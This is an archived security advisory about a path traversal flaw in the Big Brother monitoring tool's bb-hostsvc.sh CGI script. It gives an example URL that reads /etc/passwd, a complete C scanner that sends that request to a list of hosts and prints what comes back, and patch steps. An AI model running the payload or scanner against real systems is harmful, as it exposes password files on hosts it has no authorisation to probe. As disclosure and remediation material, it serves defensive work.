COMMAND
Big Brother
SYSTEMS AFFECTED
Big Brother up tp and including 1.4H
PROBLEM
Eric Hines posted following. With code below you can view the
contents of any file on the remote system including /etc/passwd
or /etc/shadow. This was identified and Proof of Concept by
Safety and Loki [LoA].
The problem exists in the code where $HOSTSVC does not do
authenticity checking for its assigned variable.
---- snip ----
# get the color of the status from the status file
set `$CAT "$BBLOGS/$HOSTSVC" | $HEAD -1` >/dev/null 2>&1 BKG="$1"
---- snap ----
Example:
http://www.bb4.com/cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../../../../../../../etc/passwd
Here's the scanner for this vulnerability:
/*
*
* 2000-07-11
*
* Ripped from phfscan.c
* Big Brother Vulnarability scanner.
* Scans for /cgi-bin/bb-hostsvc.sh.
* If it exists you might be able to read files from
* the system. Good luck.
*
*
* Author: Safety@IRCnet who also discovered the bug.
* Safety@LinuxMail.ORG
*
*
* Credits: #roothat, #vastervik, #smile, Loki, crimson, self,
* Bjurr, Metoo, and everyone else who think they should
* be on this list.
*
* Special Thanks goes to Loki who are going to host and design
* my homepage.
*
*
* Usage:
*
* ./bbscan < hostlist > outputfile
*
*/
#include <sys/stat.h>
#include <sys/types.h>
#include <termios.h>
#include <unistd.h>
#include <stdio.h>
#include <fcntl.h>
#include <sys/syslog.h>
#include <sys/param.h>
#include <sys/times.h>
#ifdef LINUX
#include <sys/time.h>
#endif
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/signal.h>
#include <arpa/inet.h>
#include <netdb.h>
int FLAG = 1;
int Call(int signo)
{
FLAG = 0;
}
main (int argc, char *argv[])
{
char host[100], buffer[1024], hosta[1024],FileBuf[8097];
int outsocket, serv_len, len,X,c,outfd;
struct hostent *nametocheck;
struct sockaddr_in serv_addr;
struct in_addr outgoing;
char bbvuln[]="GET /cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../../../../../../../etc/passwd\n\n";
while(fgets(hosta,100,stdin))
{
if(hosta[0] == '\0')
break;
hosta[strlen(hosta) -1] = '\0';
write(1,hosta,strlen(hosta)*sizeof(char));
write(1,"\n",sizeof(char));
outsocket = socket (AF_INET, SOCK_STREAM, 0);
memset (&serv_addr, 0, sizeof (serv_addr));
serv_addr.sin_family = AF_INET;
nametocheck = gethostbyname (hosta);
/* Ugly stuff to get host name into inet_ntoa form */
(void *) memcpy (&outgoing.s_addr, nametocheck->h_addr_list[0],
sizeof (outgoing.s_addr));
strncpy(host, inet_ntoa (outgoing), 100);
serv_addr.sin_addr.s_addr = inet_addr (host);
serv_addr.sin_port = htons (80);
signal(SIGALRM,Call);
FLAG = 1;
alarm(10);
X=connect (outsocket, (struct sockaddr *) &serv_addr, sizeof (serv_addr));
alarm(0);
if(FLAG == 1 && X==0){
write(outsocket,bbvuln,strlen(bbvuln)*sizeof(char));
while((X=read(outsocket,FileBuf,8096))!=0)
write(1,FileBuf,X);
}
close (outsocket);
}
return 0;
}
SOLUTION
BB4 Technologies has already been notified and a patch is already
out. It can be Downloaded from
http://www.bb4.com/download.html
Required only on hosts that are defined as BBDISPLAY. Don't
forget hosts that were at one point BBDISPLAY but were turned into
a client only host afterwards.
1) If you have BBLOGSTATUS=DYNAMIC set in etc/bbdef.sh, then
download BB 1.4h2 and extract bb-hostsvc.sh. Replace the
script in the cgi-bin and set the BBHOME variable in the
bb-hostsvc.sh script. Make sure the script has the proper
permissions.
2) If you have BBLOGSTATUS=STATIC or BBLOGSTATUS=TEXT set in
etc/bbdef.sh, then just remove the bb-hostsvc.sh from the
cgi-bin directory as it is not required for these setups.
3) Set BBLOGSTATUS=STATIC in bbdef.sh and remove the script as
described in 2).
Jake Schleich found that by just downloading the new 1.4h2 and
running the bbconfig and filling in the variables, it overwrote
the offending file without me having to reinstall the entire
thing; a pain when it comes to reconfiguring. It asks which files
it will overwrite in the cgi-bin, you just say no to the custom
ones(if you have replaced a few of the default bb cgi's with /ext
released versions as I have) and replace the offending file(s).
So in short, the bbconfig script will fix the problem without a
rebuild.